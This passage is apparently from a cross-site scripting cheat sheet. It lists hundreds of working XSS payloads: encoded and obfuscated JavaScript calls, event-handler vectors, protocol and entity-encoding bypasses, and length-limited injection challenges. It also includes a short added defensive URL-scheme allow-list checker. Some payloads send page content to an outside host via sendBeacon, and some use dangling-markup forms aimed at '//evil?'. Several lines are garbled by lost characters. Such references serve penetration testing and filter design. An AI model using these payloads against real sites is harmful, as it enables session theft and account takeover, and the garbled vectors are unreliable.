globalThis['\x65\x76\x61\x6c'](globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, octal escape sequence (window, self, this, top, parent, frames, globalThis)
window['\141\154\145\162\164']('\130\123\123')
self['\141\154\145\162\164']('\130\123\123')
this['\141\154\145\162\164']('\130\123\123')
top['\141\154\145\162\164']('\130\123\123')
parent['\141\154\145\162\164']('\130\123\123')
frames['\141\154\145\162\164']('\130\123\123')
globalThis['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, unicode escape (window, self, this, top, parent, frames, globalThis)
window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
self['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
this['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
top['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
parent['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
globalThis['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, RegExp source property (window, self, this, top, parent, frames, globalThis)
window[/al/.source+/ert/.source](/XSS/.source)
self[/al/.source+/ert/.source](/XSS/.source)
this[/al/.source+/ert/.source](/XSS/.source)
top[/al/.source+/ert/.source](/XSS/.source)
parent[/al/.source+/ert/.source](/XSS/.source)
frames[/al/.source+/ert/.source](/XSS/.source)
globalThis[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, Hieroglyphy/JSFuck (window, self, this, top, parent, frames, globalThis)
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+!![]+[])[+[]])
self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+!![]+[])[+[]])
this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+!![]+[])[+[]])
top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+!![]+[])[+[]])
parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+!![]+[])[+[]])
frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+!![]+[])[+[]])
globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+!![]+[])[+[]])
Classic vectors (XSS crypt)
Image src with JavaScript protocol
<img src="javascript:alert(1)">
Body background with JavaScript protocol
<body background="javascript:alert(1)">
Iframe data URLs no longer work, as modern browsers use a null origin
<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
Impossible labs
Title | Description | Length limit | Closest vector
Basic context, WAF blocks <[a-zA-Z] | This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag. | N/A | N/A
Script based injection, but quotes, forward slash and backslash are escaped | We often encounter this situation in the wild: you have an injection inside a JavaSc
ript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points, the first within a script based context and the second in HTML. | N/A | N/A
innerHTML context, but no equals allowed | You have a site that processes the query string and URL decodes the parameters, but splits on the equals and then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event. | N/A | N/A
Basic context, length limit | This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q/oncut=alert``, but can you beat it? | 15 | <q oncut=alert``
Attribute context, length limit | The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, oncut=alert``+ (the plus is a trailing space). Do you think you can beat it? | 14 | oncut=alert``
Basic context, length limit, arbitrary code | It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code. | 19 | <q/oncut=eval(name)
Attribute context, length limit, arbitrary code | Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript. | 17 | See link
Injection occurs inside a frameset but before the body | We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy. | N/A | N/A
Injection occurs inside a single quoted string; only the characters a-z0-9+` are allowed | The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`. | N/A | N/A
Classic vectors (XSS crypt), continued
VBScript protocol used to work in IE
<a href="vbscript:MsgBox+1">XSS</a>
<a href="#" onclick="vbs:Msgbox+1">XSS</a>
<a href="#" onclick="VBS:Msgbox+1">XSS</a>
<a href="#" onclick="vbscript:Msgbox+1">XSS</a>
<a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a>
<a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>
JScript compact was a minimal version of JS that wasn't widely used in IE
<a href="#" onclick="jscript.compact:alert(1);">test</a>
<a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScript.Encode allows encoded JavaScript
<a href="#" language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
<a href="#" onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
VBScript.Encode allows encoded VBScript
<iframe onload="VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
<iframe language=VBScript.Encode onload="#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
JavaScript entities used to work in Netscape Navigator
<a title="&{alert(1)}">XSS</a>
JavaScript stylesheets used to be supported by Netscape Navigator
<link href="xss.js" rel=stylesheet type="text/javascript">
Button used to consume markup
<form><button name=x formaction=x><b>stealme
IE9 select elements and plaintext used to consume markup
<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
XBL, Firefox only <= 2
<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="-moz-bindin\67:url(//businessinfo.co.uk/lab\s/xbl/xbl.xml#xss)">
<div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/lab\s/xbl/xbl.xml#xss)">
XBL also worked in FF3.5 using data URLs
ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions, <=IE7
<div style=xss:expression(alert(1))>
<div style=xss:expression(1)-alert(1)>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio\006e(alert(1))>
<div style=xss:expressio\00006e(alert(1))>
<div style=xss:expressio&#x5c;6e(alert(1))>
In quirks mode IE allowed you to use = instead of :
<div style=xss=expression(alert(1))>
<div style="color&#x3d;red">test</div>
Behaviors for older modes of IE
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Older versions of IE supported event handlers in functions
<script> function window.onload() { alert(1) } </script>
<script> function window::onload() { alert(1) } </script>
<script> function window.location() {} </script>
<body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML() {} </script> </body>
<body> <script> function document.body.innerHTML() { x = '<img src=1 onerror=alert(1)>' } </script> </body>
GreyMagic HTML+TIME exploit (no longer works, even in 5 docmode)
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
Firefox allows NULLs after &
lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities
lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside opening comments
<!-- ><img title="--><iframe/onload=alert(1)>"> -->
<!-- ><img title="--><iframe/onload=alert(1)>"> -->
Safari used to allow any tag to have an onload event inside SVG
<svg><xss onload=alert(1)>
Isindex using src attribute
<isindex type=image src="//evil?
Isindex using submit
<isindex type=submit style="width:100%;height:100%" value=XSS formaction="//evil?
Isindex and formaction
<isindex type=submit formaction=javascript:alert(1)>
Isindex and action
<isindex type=submit action=javascript:alert(1)>
Credits
Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.
This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle Mario Heiderich Eduardo Vela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Inführ Mathias Karlsson Jan Horn Ian Hickey Gábor Molnár tsetnep Psych0tr1a Skyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David Lindsay Superhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz Soroush Dalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SØᴘᴀS avanish46 Juuso Käenmäki jinmo123 itszn13 Martin Bajanik David Granqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C. gadhiyasavan p4fg diofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.
Event handlers that do require user interaction
Event | Description | Code
onauxclick | Fires when right clicking or using the middle button of the mouse | <input onauxclick=alert(1)>
onbeforecopy | Requires you copy a piece of text | <a onbeforecopy=alert(1) contenteditable>test</a>
onbeforecut | Requires you cut a piece of text | <a onbeforecut=alert(1) contenteditable>test</a>
onbeforepaste | Requires you paste a piece of text | <a onbeforepaste=alert(1) contenteditable>test</a>
onchange | Requires a change of value | <input onchange=alert(1) value=xss>
onclick | Requires a click of the element | <xss onclick=alert(1)>test</xss>
onclose | Fires when a dialog is closed | <dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
oncontextmenu | Triggered when right clicking to show the context menu | <xss oncontextmenu=alert(1)>test</xss>
oncopy | Requires you copy a piece of text | <xss oncopy=alert(1) value=XSS autofocus tabindex=1>test
oncut | Requires you cut a piece of text | <xss oncut=alert(1) value=XSS autofocus tabindex=1>test
ondblclick | Triggered when double clicking the element | <xss ondblclick=alert(1) autofocus tabindex=1>test</xss>
ondrag | Triggered when dragging the element | <xss draggable=true ondrag=alert(1)>test</xss>
ondragend | Triggered when dragging of the element is finished | <xss draggable=true ondragend=alert(1)>test</xss>
ondragenter | Requires a mouse drag | <xss draggable=true ondragenter=alert(1)>test</xss>
ondragleave | Requires a mouse drag | <xss draggable=true ondragleave=alert(1)>test</xss>
ondragover | Triggered when dragging over an element | <div draggable=true contenteditable>drag me</div><xss ondragover=alert(1) contenteditable>drop here</xss>
ondragstart | Requires a mouse drag | <xss draggable=true ondragstart=alert(1)>test</xss>
ondrop | Triggered when dropping a draggable element | <div draggable=true contenteditable>drag me</div><xss ondrop=alert(1) contenteditable>drop here</xss>
onfullscreenchange | Fires when a video changes full screen status | <video onfullscreenchange=alert(1) src=validvideo.mp4 controls>
oninput | Requires a change of value | <input oninput=alert(1) value=xss>
oninvalid | Requires a form submission with an element that does not satisfy its constraints, such as a required attribute | <form><input oninvalid=alert(1) required><input type=submit>
onkeydown | Triggered when a key is pressed | <xss onkeydown=alert(1) contenteditable>test</xss>
onkeypress | Triggered when a key is pressed | <xss onkeypress=alert(1) contenteditable>test</xss>
onkeyup | Triggered when a key is released | <xss onkeyup=alert(1) contenteditable>test</xss>
onmousedown | Triggered when the mouse is pressed | <xss onmousedown=alert(1)>test</xss>
onmouseenter | Triggered when the mouse is hovered over the element | <xss onmouseenter=alert(1)>test</xss>
onmouseleave | Triggered when the mouse is moved away from the element | <xss onmouseleave=alert(1)>test</xss>
onmousemove | Requires mouse movement | <xss onmousemove=alert(1)>test</xss>
onmouseout | Triggered when the mouse is moved away from the element | <xss onmouseout=alert(1)>test</xss>
onmouseover | Requires a hover over the element | <xss onmouseover=alert(1)>test</xss>
onmouseup | Triggered when the mouse button is released | <xss onmouseup=alert(1)>test</xss>
onmousewheel | Fires when the mousewheel scrolls | <xss onmousewheel=alert(1)>requires scrolling
onmozfullscreenchange | Fires when a video changes full screen status | <video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls>
onpagehide | Fires when the page is changed | <body onpagehide=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>
onpaste | Requires you paste a piece of text | <a onpaste=alert(1) contenteditable>test</a>
onpause | Requires clicking the element to pause | <audio autoplay controls onpause=alert(1)><source src=validaudio.wav type=audio/wav></audio>
onpointerdown | Fires on mouse down | <xss onpointerdown=alert(1)>XSS</xss>
onpointerenter | Fires on mouse enter | <xss onpointerenter=alert(1)>XSS</xss>
onpointerleave | Fires on mouse leave | <xss onpointerleave=alert(1)>XSS</xss>
onpointermove | Fires on mouse move | <xss onpointermove=alert(1)>XSS</xss>
onpointerout | Fires on mouse out | <xss onpointerout=alert(1)>XSS</xss>
onpointerover | Fires on mouse over | <xss onpointerover=alert(1)>XSS</xss>
onpointerrawupdate | Fires when the pointer changes | <xss onpointerrawupdate=alert(1)>XSS</xss>
onpointerup | Fires on mouse up | <xss onpointerup=alert(1)>XSS</xss>
onreset | Requires a click | <form onreset=alert(1)><input type=reset>
onsearch | Fires when a form is submitted and the input has a type attribute of search | <form><input type=search onsearch=alert(1) value="Hit return" autofocus>
onseeked | Requires clicking the element timeline | <audio autoplay controls onseeked=alert(1)><source src=validaudio.wav type=audio/wav></audio>
onseeking | Requires clicking the element timeline | <audio autoplay controls onseeking=alert(1)><source src=validaudio.wav type=audio/wav></audio>
onselect | Requires you select text | <input onselect=alert(1) value=XSS autofocus>
onselectionchange | Fires when text selection is changed on the page | <body onselectionchange=alert(1)>select some text
onselectstart | Fires when beginning a text selection | <body onselectstart=alert(1)>select some text
onshow | Fires when a context menu is shown | <div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>
onsubmit | Requires a form submission | <form onsubmit=alert(1)><input type=submit>
ontouchend | Fires when a touch on the touch screen ends (mobile devices only) | <body ontouchend=alert(1)>
ontouchmove | Fires when a touch moves across the touch screen (mobile devices only) | <body ontouchmove=alert(1)>
ontouchstart | Fires when the touch screen is touched (mobile devices only) | <body ontouchstart=alert(1)>
onvolumechange | Requires volume adjustment | <audio autoplay controls onvolumechange=alert(1)><source src=validaudio.wav type=audio/wav></audio>
onwheel | Fires when you use the mouse wheel | <body onwheel=alert(1)>
Restricted characters
No parentheses, using exception handling
<script>onerror=alert;throw 1</script>
No parentheses, using exception handling, no semicolons
<script>{onerror=alert}throw 1</script>
No parentheses, using exception handling, no semicolons, using expressions
<script>throw onerror=alert,1</script>
No parentheses, using exception handling and eval
<script>throw onerror=eval,'=alert\x281\x29'</script>
No parentheses, using exception handling and eval on Firefox
<script>onerror=eval;throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
No parentheses, using ES6 hasInstance and instanceof with eval
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
No parentheses, using ES6 hasInstance and instanceof with eval, without .
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
No parentheses, using location redirect
<script>location='javascript:alert\x281\x29'</script>
No parentheses, using location redirect, no strings
<script>location=name</script>
No parentheses, using template strings
<script>alert`1`</script>
No parentheses, using template strings and location hash
<script>new Function`X${document.location.hash.substr`1`}`</script>
No parentheses or spaces, using template strings and location hash
<script>Function`X${document.location.hash.substr`1`}```</script>
Frameworks
Bootstrap onanimationstart event
<xss class=progress-bar-animated onanimationstart=alert(1)>
Bootstrap ontransitionend event
<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>
Protocols
Iframe src attribute with JavaScript protocol
<iframe src="javascript:alert(1)">
Object data attribute with JavaScript protocol
<object data="javascript:alert(1)">
Embed src attribute with JavaScript protocol
<embed src="javascript:alert(1)">
A standard JavaScript protocol
<a href="javascript:alert(1)">XSS</a>
The protocol is not case sensitive
<a href="JaVaScript:alert(1)">XSS</a>
Characters \x01-\x20 are allowed before the protocol
<a href=" javascript:alert(1)">XSS</a>
Characters \x09, \x0a, \x0d are allowed inside the protocol
<a href="javas	cript:alert(1)">XSS</a>
Characters \x09, \x0a, \x0d are allowed after the protocol name, before the colon
<a href="javascript	:alert(1)">XSS</a>
Xlink namespace inside SVG with JavaScript protocol
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>
SVG animate tag using values
<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
SVG animate tag using to
<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
SVG set tag
<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
Data protocol inside script src
<script src="data:text/javascript,alert(1)"></script>
SVG script href attribute without closing script tag
<svg><script href="data:text/javascript,alert(1)" />
SVG use element (Chrome/Firefox)
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
Import statement with data URL
<script>import('data:text/javascript,alert(1)')</script>
Base tag with JavaScript protocol rewriting relative URLs
<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>
MathML makes any tag clickable
<math><x href="javascript:alert(1)">blah
Button and formaction
<form><button formaction=javascript:alert(1)>XSS
Input and formaction
<form><input type=submit formaction=javascript:alert(1) value=XSS>
Form and action
<form action=javascript:alert(1)><input type=submit value=XSS>
Use element with an external URL
<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>
Animate tag with keytimes and multiple values
<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>
Other useful attributes
Using srcdoc attribute: <iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
Using srcdoc with entities: <iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>
Click a submit element from anywhere on the page, even outside the form: <form action=javascript:alert(1)><input type=submit id=x></form><label for=x>XSS</label>
Hidden inputs: access key attributes can enable XSS on normally unexploitable elements: <input type="hidden" accesskey="X" onclick="alert(1)"> (press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)
Link elements: access key attributes can enable XSS on normally unexploitable elements: <link rel="canonical" accesskey="X" onclick="alert(1)" /> (press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)
Download attribute can save a copy of the current webpage: <a href=# download="filename.html">Test</a>
Disable referrer using referrerpolicy: <img referrerpolicy="no-referrer" src="//portswigger-labs.net">
Set window.name via parameter on the window.open function: <a href="#" onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>
Set window.name via name attribute in an <iframe> tag: <iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></iframe>
Set window.name via target attribute in a <base> tag: <base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>
Set window.name via target attribute in an <a> tag: <a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>
Set window.name via usemap attribute in an <img> tag: <img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>
Set window.name via target attribute in a <form> tag: <form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>
Set window.name via formtarget attribute in an <input> tag of type submit: <form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>
Set window.name via formtarget attribute in an <input> tag of type image: <form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>
Special tags
Redirect to a different domain: <meta http-equiv="refresh" content="0; url=//portswigger-labs.net">
Meta charset attribute, UTF-7: <meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Meta charset UTF-7 via Content-Type: <meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 1: +/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 2: +/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 3: +/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 4: +/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Upgrade insecure requests: <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
Disable JavaScript via iframe sandbox: <iframe sandbox src="//portswigger-labs.net"></iframe>
Disable referrer: <meta name="referrer" content="no-referrer">
Encoding
Overlong UTF-8 (each leading byte sequence is an overlong encoding of "<"): \xC0\xBCscript>alert(1)</script> \xE0\x80\xBCscript>alert(1)</script> \xF0\x80\x80\xBCscript>alert(1)</script> \xF8\x80\x80\x80\xBCscript>alert(1)</script> \xFC\x80\x80\x80\x80\xBCscript>alert(1)</script>
Unicode escapes: <script>\u0061lert(1)</script>
Unicode escapes, ES6 style: <script>\u{61}lert(1)</script>
Unicode escapes, ES6 style, zero padded: <script>\u{0000000061}lert(1)</script>
Hex encoding (JavaScript escapes): <script>eval('\x61lert(1)')</script>
Octal encoding: <script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>
Decimal encoding with optional semi-colon: <a href="&#106;avascript:alert(1)">XSS</a> <a href="&#106avascript:alert(1)">XSS</a>
SVG script with HTML encoding: <svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1)//";</script></svg>
Decimal encoding with padded zeros: <a href="&#0000106avascript:alert(1)">XSS</a>
Hex encoding entities: <a href="&#x6a;avascript:alert(1)">XSS</a>
Hex encoding without semi-colon, provided the next character is not a-f0-9: <a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> (the extraction shows a space between the entity and avascript in the last two; for the scheme to survive URL parsing that separator has to be one of the \x09, \x0a, \x0d characters the parser strips, as in the Protocols section)
Hex encoding with padded zeros: <a href="&#x0000006a;avascript:alert(1)">XSS</a>
Hex encoding is not case sensitive: <a href="&#X6A;avascript:alert(1)">XSS</a>
HTML entities: <a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>
URL encoding: <a href="javascript:x='%27-alert(1)-%27';">XSS</a>
HTML entities and URL encoding: <a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>
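The Protocols and Encoding vectors above all work for the same reason: an attribute value passes through two parsers before the browser decides what scheme it has. The HTML tokenizer decodes character references (semicolon optional on numeric references, leading zeros ignored, hex marker case-insensitive), and the URL parser then strips leading \x00-\x20, deletes every tab, newline and carriage return, and matches the scheme case-insensitively. A filter that looks for the literal string "javascript:" runs before both and sees none of this. The following JavaScript is an added example, not part of the cheat sheet: it applies the same two normalisation steps and then allow-lists the scheme, and runs that check over the href values from the vectors above. The named-entity table is a subset (real parsers know about 2200 names), and the sample inputs are constructed for this example.

```javascript
// Added example, not part of the cheat sheet: normalise a URL attribute value the way a
// browser does before it decides which scheme the URL has, then allow-list the scheme.

// Named references the vectors on this page rely on. A real parser knows ~2200 names;
// this subset demonstrates the technique, and unknown names are left untouched.
const NAMED = {
  colon: ':', Tab: '\t', NewLine: '\n', lpar: '(', rpar: ')', sol: '/', semi: ';',
  percnt: '%', quot: '"', apos: "'", lt: '<', gt: '>', amp: '&',
};

// HTML attribute value: decode character references. Numeric references decode with or
// without the trailing semicolon, digits are read greedily (so &#106avascript is 'j' +
// 'avascript', while &#x6aavascript would read as 0x6aa), leading zeros are ignored and
// both the hex marker and the hex digits are case-insensitive.
function decodeAttributeValue(value) {
  return value
    .replace(/&#[xX]([0-9a-fA-F]+);?/g, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#([0-9]+);?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
    .replace(/&([A-Za-z]+);/g, (m, n) => (n in NAMED ? NAMED[n] : m));
}

// URL parser: strip leading and trailing C0 controls and space, delete ASCII tab and
// newline wherever they occur, then read the scheme. Returns null for a relative URL.
function urlScheme(decoded) {
  const s = decoded
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
  const m = /^([A-Za-z][A-Za-z0-9+.-]*):/.exec(s);
  return m ? m[1].toLowerCase() : null;
}

// Allow-list rather than deny-list: javascript:, vbscript:, data: and any scheme a
// browser adds later all fail closed.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

function isSafeUrlAttribute(raw) {
  const scheme = urlScheme(decodeAttributeValue(raw));
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Constructed inputs: href values taken from the vectors above plus some benign ones.
const SAMPLES = [
  'javascript:alert(1)',
  'JaVaScript:alert(1)',
  '\u0001javascript:alert(1)',            // control character before the scheme
  'javas\tcript:alert(1)',               // tab inside the scheme name
  'javascript\n:alert(1)',               // newline before the colon
  '&#106;avascript:alert(1)',
  '&#106avascript:alert(1)',
  '&#0000106avascript:alert(1)',
  'j&#x61vascript:alert(1)',
  '&#X6A;avascript:alert(1)',
  'javascript&colon;alert&lpar;1&rpar;',
  'java&Tab;script:alert(1)',
  'java&NewLine;script:alert(1)',
  'data:text/html,<script>alert(1)</script>',
  'https://example.com/?next=javascript:alert(1)',  // javascript: in the query is harmless
  '/relative/path?x=javascript:',
  'mailto:someone@example.com',
];

function classify(samples = SAMPLES) {
  return samples.map((raw) => ({
    raw,
    scheme: urlScheme(decodeAttributeValue(raw)),
    safe: isSafeUrlAttribute(raw),
  }));
}

for (const r of classify()) {
  console.log(r.safe ? 'allow' : 'block', JSON.stringify(r.raw), '->', r.scheme);
}
```

The order of the two steps matters and mirrors the browser: entity decoding first, whitespace stripping second, so `java&Tab;script:` is caught only because the tab produced by the entity is deleted afterwards. Note also what the check does not do: `//evil?` and `https://attacker.example` pass, because scheme allow-listing stops script execution, not open redirects or dangling-markup exfiltration.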
Obfuscation
Data protocol inside script src with base64: <script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
Data protocol inside script src with base64 and HTML entities: <script src="data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;"></script>
Data protocol inside script src with base64 and URL encoding: <script src="data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d"></script>
Iframe srcdoc HTML encoded: <iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>
Iframe JavaScript URL with HTML and URL encoding (decodes to javascript:%3Cscript%3Ealert(1)%3C%2Fscript%3E): <iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>
